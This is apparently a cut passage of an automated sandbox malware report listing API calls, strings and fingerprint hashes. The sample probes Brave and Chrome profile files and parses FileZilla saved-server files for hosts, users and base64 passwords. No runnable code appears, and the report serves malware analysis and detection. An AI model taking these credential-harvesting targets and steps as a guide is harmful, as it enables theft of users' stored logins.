                                • lstrlen.KERNEL32(006F1794), ref: 006CDD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDDA3
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CDDAF
                                • lstrlen.KERNEL32(?), ref: 006CDDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 006CDDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDE19
                                • lstrlen.KERNEL32(006F1794), ref: 006CDE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CDE6F
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CDE7B
                                • lstrlen.KERNEL32(00F18C30), ref: 006CDE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDEBB
                                • lstrlen.KERNEL32(006F1794), ref: 006CDEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CDEE6
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CDEF2
                                • lstrlen.KERNEL32(00F18950), ref: 006CDF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDFA5
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CDFB1
                                • lstrlen.KERNEL32(00F18C30), ref: 006CDFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDFF4
                                • lstrlen.KERNEL32(006F1794), ref: 006CDFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE022
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CE02E
                                • lstrlen.KERNEL32(00F18950), ref: 006CE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 006CE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 006CE0E7
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CE11F
                                • lstrlen.KERNEL32(00F1EFF0), ref: 006CE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE155
                                • lstrcat.KERNEL32(00000000,?), ref: 006CE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE19F
                                • lstrcat.KERNEL32(00000000), ref: 006CE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 006CE1F9
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CE22F
                                • lstrlen.KERNEL32(00F18A10), ref: 006CE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE261
                                • lstrcat.KERNEL32(00000000,00F18A10), ref: 006CE269
                                • lstrlen.KERNEL32(\Brave\Preferences), ref: 006CE274
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE29B
                                • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 006CE2A7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE2CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE30F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE349
                                • DeleteFileA.KERNEL32(?), ref: 006CE381
                                • StrCmpCA.SHLWAPI(?,00F1EF48), ref: 006CE3AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE3F4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE41C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE445
                                • StrCmpCA.SHLWAPI(?,00F18950), ref: 006CE468
                                • StrCmpCA.SHLWAPI(?,00F18C30), ref: 006CE47D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE4D9
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006CE4E0
                                • StrCmpCA.SHLWAPI(?,00F1F038), ref: 006CE58E
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CE5C4
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 006CE639
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE678
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE6A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE6C7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE70E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE737
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE75C
                                • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 006CE776
                                • DeleteFileA.KERNEL32(?), ref: 006CE7D2
                                • StrCmpCA.SHLWAPI(?,00F18970), ref: 006CE7FC
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE88C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE8B5
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE8EE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE916
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE952
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 2635522530-726946144
                                • Opcode ID: 3daab669580c9a76ae5fb0e6d7834d76625f096055e4ec61935ee2abd3e36e13
                                • Instruction ID: 156896eacefcfa5ec2528e58e0b3241ec4614292636b7debe49a52e9148c1b20
                                • Opcode Fuzzy Hash: 3daab669580c9a76ae5fb0e6d7834d76625f096055e4ec61935ee2abd3e36e13
                                • Instruction Fuzzy Hash: EB922671A1160A9BCB60AFB5D889FBE77BAFF44300F04452CF84AA7251DB34E945CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D18D2
                                • lstrlen.KERNEL32(\*.*), ref: 006D18DD
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D18FF
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 006D190B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1932
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006D1947
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006D1967
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006D1981
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D19BF
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D19F2
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D1A1A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D1A25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1A4C
                                • lstrlen.KERNEL32(006F1794), ref: 006D1A5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1A80
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1AB4
                                • lstrlen.KERNEL32(?), ref: 006D1AC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1AE5
                                • lstrcat.KERNEL32(00000000,?), ref: 006D1AF3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1B19
                                • lstrlen.KERNEL32(00F18A20), ref: 006D1B2F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1B59
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D1B64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1B8F
                                • lstrlen.KERNEL32(006F1794), ref: 006D1BA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1BC3
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D1BCF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1BF8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1C25
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D1C30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1C57
                                • lstrlen.KERNEL32(006F1794), ref: 006D1C69
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1C8B
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D1C97
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1CC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1CEF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D1CFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1D21
                                • lstrlen.KERNEL32(006F1794), ref: 006D1D33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1D55
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D1D61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1D8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1DB9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D1DC4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1DED
                                • lstrlen.KERNEL32(006F1794), ref: 006D1E19
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1E36
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D1E42
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1E68
                                • lstrlen.KERNEL32(00F1F098), ref: 006D1E7E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1EB2
                                • lstrlen.KERNEL32(006F1794), ref: 006D1EC6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1EE3
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D1EEF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1F15
                                • lstrlen.KERNEL32(00F1F460), ref: 006D1F2B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1F5F
                                • lstrlen.KERNEL32(006F1794), ref: 006D1F73
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1F90
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D1F9C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1FC2
                                • lstrlen.KERNEL32(00F0A6B0), ref: 006D1FD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2000
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D200B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2036
                                • lstrlen.KERNEL32(006F1794), ref: 006D2048
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2067
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D2073
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2098
                                • lstrlen.KERNEL32(?), ref: 006D20AC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D20D0
                                • lstrcat.KERNEL32(00000000,?), ref: 006D20DE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2103
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D213F
                                • lstrlen.KERNEL32(00F1EFF0), ref: 006D214E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2176
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D2181
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                • String ID: \*.*
                                • API String ID: 712834838-1173974218
                                • Opcode ID: 152e005e54570fe74b7ed4f1e604b862090ad74bbd615e747004a2dcdaff2519
                                • Instruction ID: 052c4e8ff05b515ecc8afc76e4cc1596348708ccb4b8ac3a940a947ae3259112
                                • Opcode Fuzzy Hash: 152e005e54570fe74b7ed4f1e604b862090ad74bbd615e747004a2dcdaff2519
                                • Instruction Fuzzy Hash: 8662397191161BABCB22ABA6CC58FBE76BBBF45700F040129F8099B351DF74D945CBA0
                                APIs
                                • wsprintfA.USER32 ref: 006D392C
                                • FindFirstFileA.KERNEL32(?,?), ref: 006D3943
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006D396C
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006D3986
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D39BF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D39E7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D39F2
                                • lstrlen.KERNEL32(006F1794), ref: 006D39FD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3A1A
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D3A26
                                • lstrlen.KERNEL32(?), ref: 006D3A33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3A53
                                • lstrcat.KERNEL32(00000000,?), ref: 006D3A61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3A8A
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D3ACE
                                • lstrlen.KERNEL32(?), ref: 006D3AD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3B05
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D3B10
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3B36
                                • lstrlen.KERNEL32(006F1794), ref: 006D3B48
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3B6A
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D3B76
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3B9E
                                • lstrlen.KERNEL32(?), ref: 006D3BB2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3BD2
                                • lstrcat.KERNEL32(00000000,?), ref: 006D3BE0
                                • lstrlen.KERNEL32(00F18A10), ref: 006D3C0B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3C31
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D3C3C
                                • lstrlen.KERNEL32(00F18A20), ref: 006D3C5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3C84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D3C8F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3CB7
                                • lstrlen.KERNEL32(006F1794), ref: 006D3CC9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3CE8
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D3CF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3D1A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D3D47
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D3D52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3D79
                                • lstrlen.KERNEL32(006F1794), ref: 006D3D8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3DAD
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D3DB9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3DE2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3E11
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D3E1C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3E43
                                • lstrlen.KERNEL32(006F1794), ref: 006D3E55
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3E77
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D3E83
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3EAC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3EDB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D3EE6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3F0D
                                • lstrlen.KERNEL32(006F1794), ref: 006D3F1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3F41
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D3F4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3F75
                                • lstrlen.KERNEL32(?), ref: 006D3F89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3FA9
                                • lstrcat.KERNEL32(00000000,?), ref: 006D3FB7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D3FE0
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D401F
                                • lstrlen.KERNEL32(00F1EFF0), ref: 006D402E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4056
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D4061
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D408A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D40CE
                                • lstrcat.KERNEL32(00000000), ref: 006D40DB
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006D42D9
                                • FindClose.KERNEL32(00000000), ref: 006D42E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 1006159827-1013718255
                                • Opcode ID: b410499a11273857a933e01a851d92afc05c79a36a0935f68cb43d3b4017583c
                                • Instruction ID: 8ef2d56814a64a334c9d9f3cefd0370d990eaddff6ad49f885a8e55036247ac3
                                • Opcode Fuzzy Hash: b410499a11273857a933e01a851d92afc05c79a36a0935f68cb43d3b4017583c
                                • Instruction Fuzzy Hash: CE623871911626ABCB21ABB6D859FBE77BABF44300F044129F849A7350DF34EE41CB91
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6995
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006D69C8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6A29
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D6A34
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6A5D
                                • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 006D6A77
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6A99
                                • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 006D6AA5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6AD0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6B00
                                • LocalAlloc.KERNEL32(00000040,?), ref: 006D6B35
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6B9D
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6BCD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 313953988-555421843
                                • Opcode ID: 74c0c7dc415a427a0264fa8cf6a68947915d722903927157998a00fdeb8a3c20
                                • Instruction ID: 48a4e5da17b4d175da0e65c1979e543c315222a48727045d06fe3020fb4d1c57
                                • Opcode Fuzzy Hash: 74c0c7dc415a427a0264fa8cf6a68947915d722903927157998a00fdeb8a3c20
                                • Instruction Fuzzy Hash: D7424871A11616ABCB21ABB5DC99FBEBABAEF44700F044429F849E7351DF34D901CB60
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CDBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDBEF
                                • lstrlen.KERNEL32(006F4CA8), ref: 006CDBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDC17
                                • lstrcat.KERNEL32(00000000,006F4CA8), ref: 006CDC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDC4C
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CDC8F
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CDCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006CDCD0
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006CDCF0
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006CDD0A
                                • lstrlen.KERNEL32(006ECFEC), ref: 006CDD1D
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CDD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDD7B
                                • lstrlen.KERNEL32(006F1794), ref: 006CDD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDDA3
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CDDAF
                                • lstrlen.KERNEL32(?), ref: 006CDDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 006CDDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDE19
                                • lstrlen.KERNEL32(006F1794), ref: 006CDE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CDE6F
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CDE7B
                                • lstrlen.KERNEL32(00F18C30), ref: 006CDE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDEBB
                                • lstrlen.KERNEL32(006F1794), ref: 006CDEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CDEE6
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CDEF2
                                • lstrlen.KERNEL32(00F18950), ref: 006CDF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDFA5
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CDFB1
                                • lstrlen.KERNEL32(00F18C30), ref: 006CDFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDFF4
                                • lstrlen.KERNEL32(006F1794), ref: 006CDFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE022
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CE02E
                                • lstrlen.KERNEL32(00F18950), ref: 006CE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 006CE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 006CE0E7
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CE11F
                                • lstrlen.KERNEL32(00F1EFF0), ref: 006CE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE155
                                • lstrcat.KERNEL32(00000000,?), ref: 006CE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE19F
                                • lstrcat.KERNEL32(00000000), ref: 006CE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 006CE1F9
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CE22F
                                • lstrlen.KERNEL32(00F18A10), ref: 006CE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE261
                                • lstrcat.KERNEL32(00000000,00F18A10), ref: 006CE269
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006CE988
                                • FindClose.KERNEL32(00000000), ref: 006CE997
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
